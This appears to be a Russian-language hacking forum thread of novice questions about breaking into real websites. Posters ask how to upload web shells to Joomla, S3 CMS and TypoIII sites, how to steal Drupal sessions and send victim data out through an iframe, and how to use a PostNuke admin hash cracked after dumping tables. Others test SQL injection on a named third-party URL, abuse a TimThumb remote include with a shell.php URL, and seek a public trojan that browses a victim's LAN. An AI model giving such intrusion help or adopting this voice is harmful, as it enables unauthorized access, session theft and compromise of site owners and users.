1. Можно ли залить шелл в джyмлy 1.7 Jsky нашел следущее: 2. Есть пассивка на почтовик, но не работает в ie и хроме. Есть ли варианты обмануть хотя бы ие?
Спрошу еще тут: Есть доступ к админке сайта. CMS - "МегаГруп Система управления S3". Есть ли возможность туда залить шелл? Кто сталкивался?
Вопрос такой: как узнать хост на котором находится сайт? вот сам сайт: http://prof-spb.ru ЗЫ. Если ошибся темой, пожалуйста перенесите в нужную.
2ip.ru "Узнать IP адрес сайта", ping prof-spb.ru выдаст ип. Но это мб не ип конкретно этого сайта, а сервера на котором не только он хоститься.
Дело такое, на одном сайте, если прописывать на одной страницы: www.sait.ru/stranita/asada www.sait.ru/stranita/22222 Вылазеет текст: PHP: {'Connection',"close"}, {'User-Agent', "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:11.0) Gecko/20100101 Firefox/11.0"}, {'Accept', {'Accept-Language', "ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3"}, {'Accept-Encoding',"gzip, deflate"}, {'Cookie', "XXXXXXXXXXXXXXXXXXXXXXXXXX"}], Сайт стоит на друпале, подскажите пожалуйста, что это за уязвимость и что можно из нее извлечь, в частности как лучше с помощью нее украсть сессию. Можно ли как-нибудь прописать запрос, который бы высылал мне все данные жертвы, ну и соответственно поместить его в ифрайме какого-нибудь html страницы.
Есть сайт, с postnuke Спарсил через информашен_чема все таблицы. Нашел таблу с юзерами, разшифровал пасс вроде как админа. Но вот в чем но Где в postnuke админка? Кроме редактирования пользователя ничего больше найти не могу Или, если админские логи хранятся не в prefix_users, можно ли их в какой табле найти?
актуальны ли сейчас xss уязвимости? Я вот в комментарий вставил javascript код, он отобразился без фильтрации, но не выполнился. Это значит, что такого рода уязвимостей на сайте нет?
Это значит, наоборот, есть фильтрация, скорее сего htmlspecialchars... Актуальны как никогда) Сначала авторизуйся на странице user.php, потом ручками перейди на admin.php
Code: http://www.turkeyhomesales.com/index.php?option=com_estateagent&Itemid=49&act=object&task=showEO&id=1999 есть скуль или нет?, не пойму
Доброго дня и с праздничком всех. Получил доступ к сайту на cms typo3, немогу найти каким образом влезть в шаблон для редактирования... Правка php файлов ничего не дает, там как-то нужно очищать кэш в админке после нововведений. help
Подскажите название трояна с возможностью просматривать локальную сеть win к которой подключен зараженный комп. Ну и ссылку если такой существует в паблике.
Вопрос на зацепку доброго дня форумчани вот такой есть прикол site.com/index.php пашет нормик(отображаеться) site.com/index.php//////////////////(вагон слешей) всё рвёт и криво отображаеться можно както раскрутить? на нулл байт уже все перерыл не пашет мож кто знает подскажите плиз
А с чего ты взял, что там у тебя инлуд? И какая версия рнр, после обновления 5.3.4 (null байт) уже не работает!
Word press TimThumb Уязвимость /wp-content/themes/theme/scripts/timthumb.php?src=http://blogger.com.site.com/shell.php (или shell.php4 shell.php%00) даёт error 503 Service temporary unavailable Всё остальное успешно инклудится и появляется в cache папке - shell.php%20 shell.gif но не работает как php файл Есть решение? вроде возможно т.к пару чужих .php файлов в папке cache уже есть
Есть сайт на Drupal, с него недавно были удалены страницы(ранее существовали, теперь 404). Возможно ли создать(воссоздать) страницы с этими определенными именами? Скажем site/node/12345 - движек, я так понял, создает со случайным номером, а нужно именно с определенным!